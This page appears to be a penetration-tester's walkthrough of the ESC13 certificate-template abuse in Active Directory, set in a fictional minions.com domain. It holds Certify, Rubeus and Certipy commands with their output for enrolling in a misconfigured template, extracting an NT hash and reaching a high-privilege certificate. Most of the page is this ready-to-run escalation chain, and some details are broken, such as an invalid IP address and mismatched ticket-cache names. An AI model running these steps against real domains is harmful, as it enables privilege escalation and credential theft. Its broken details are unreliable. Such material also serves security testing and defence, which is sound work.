Skip to main content

ESC13

If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.

Windows

Request a certificate of the certificate template <template_name>

.\Certify.exe request /ca:<ca> /template:<template_name>

Save and convert the certificate

certutil -MergePFX .\esc13.pem .\esc13.pfx

Confirm the Client Authentication EKU and the ESC13OID issuance policy

certutil -Dump -v .\esc13.pfx

Authenticate (using the certificate)

.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap

Linux

At the time of writing (04/03/2024), Certipy doesn't have support for ESC13 so we need to use a speicfic Pull Request to find the vulnerable template.

The scenario

We have valid domain credentials for the user otter and we can use certipy to look for misconfigured certificates. Doing so we find a certificate like the following, which allows users from the SomeGroup group to enroll in a high-privilege certificate

  ...

  33
    Template Name                       : AnotherCoolTemplate
    Display Name                        : AnotherCoolTemplate

	...

    Extended Key Usage                  : Server Authentication
                                          Encrypting File System
                                          Secure Email
                                          Client Authentication

    ...
	
    Permissions
      Enrollment Permissions
        Enrollment Rights               : MINIONS.COM\SomeGroup
                                          MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
      Object Control Permissions
        Owner                           : MINIONS.COM\Administrator
        Write Owner Principals          : MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
                                          MINIONS.COM\Administrator
        Write Dacl Principals           : MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
                                          MINIONS.COM\Administrator
        Write Property Principals       : MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
                                          MINIONS.COM\Administrator

  ...

The SomeGroup group contains the users from the Certificate Services group so our goal is to find a misconfigured certificate that allows members from Certificate Services to enroll which will, by proxy, allow us to enroll in the high-privilege certificate that requires the SomeGroup group; certipy usually does a pretty good job at pointing these out but it's good to take a look manually at the enrollment permissions of the certificates we find.

You can read more about how this works here.

Setting up Certipy

These are the commands to (safely) set up the certipy PR for ESC13 support

~ ∮ git clone https://github.com/ly4k/Certipy.git
~ ∮ cd Certipy
Certipy ∮ gh pr checkout 196
Certipy ∮ virtualenv venv
Certipy ∮ source ./venv/bin/activate
(venv) Certipy ∮ python3 setup.py install

Finding the vulnerable certificate

(venv) Certipy ∮ ./venv/bin/certipy find -u 'otter@minions.com' -p 'SomethingSecure123!' -stdout -dc-ip 192.168.100.1001.8 -debug -vulnerable
Certificate Templates
  0
    Template Name                       : SomeSecureTemplate 
    Display Name                        : SomeSecureTemplate
    Certificate Authorities             : minions-DC01-CA

	...
	
    [!] Vulnerabilities
      ESC13                             : 'MINIONS.COM\\Certificate Services' can enroll, template allows client authentication and issuance policy is linked to group ['CN=Certificate Managers,CN=Users,DC=minions,DC=com']

Enrolling in the vulnerable certificate

After we found a vulnerable and suitable certificate template we can enroll in it and authenticate with the newly-granted certificate to get a ticket so we can request a new certificate as part of the SomeGroup group

(venv) Certipy ∮ ./venv/bin/certipy req -u 'otter@minions.com' -p 'SomethingSecure123!' -dc-ip 192.168.100.1001.8 -template 'SomeSecureTemplate' -ca 'minions-DC01-CA' -key-size 4096

...

[*] Saved certificate and private key to 'otter.pfx'
(venv) Certipy ∮ ./venv/bin/certipy auth -pfx otter.pfx -domain minions.com -dc-ip 192.168.100.1001.8

...

[*] Saved credential cache to 'otter.ccache'
[*] Trying to retrieve NT hash for 'otter'
[*] Got hash for 'otter@minions.com': aad3b435b51404eeaad3b435b51404ee:fcd6f8047a642d8d0c9d0e117634e889

Enrolling in the second certificate

(venv) Certipy ∮ export KRB5CCNAME=$PWD/otter.ccache
(venv) Certipy ∮ klist
Ticket cache: FILE: ... /Certipy/svc_cabackup.ccache
Default principal: otter@MINIONS.COM

Valid starting       Expires              Service principal
03/04/2024 09:35:20  03/04/2024 19:35:20  krbtgt/MINIONS.COM@MINIONS.COM
        renew until 04/04/2024 09:34:20

(venv) Certipy ∮ ./venv/bin/certipy req -u 'otter@minions.com' -k -no-pass -dc-ip 192.168.100.1001.8 -template 'AnotherCoolTemplate' -ca 'minions-DC01-CA' -key-size 4096 -target 'dc01.minions.com'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

...

[*] Saved certificate and private key to 'otter.pfx'

(venv) Certipy ∮ ./venv/bin/certipy auth -pfx otter.pfx -domain minions.com -dc-ip 192.168.100.1001.8
Certipy v4.8.2 - by Oliver Lyak (ly4k)

...

[*] Saved credential cache to 'otter.ccache'
[*] Trying to retrieve NT hash for 'otter'
[*] Got hash for 'otter@minions.com': aad3b435b51404eeaad3b435b51404ee:fcd6f8047a642d8d0c9d0e117634e889

(venv) Certipy ∮ export KRB5CCNAME=$PWD/svc_cabackup.ccache

We now have a high-privilege certificate / ticket we can authenticate with.

References

https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53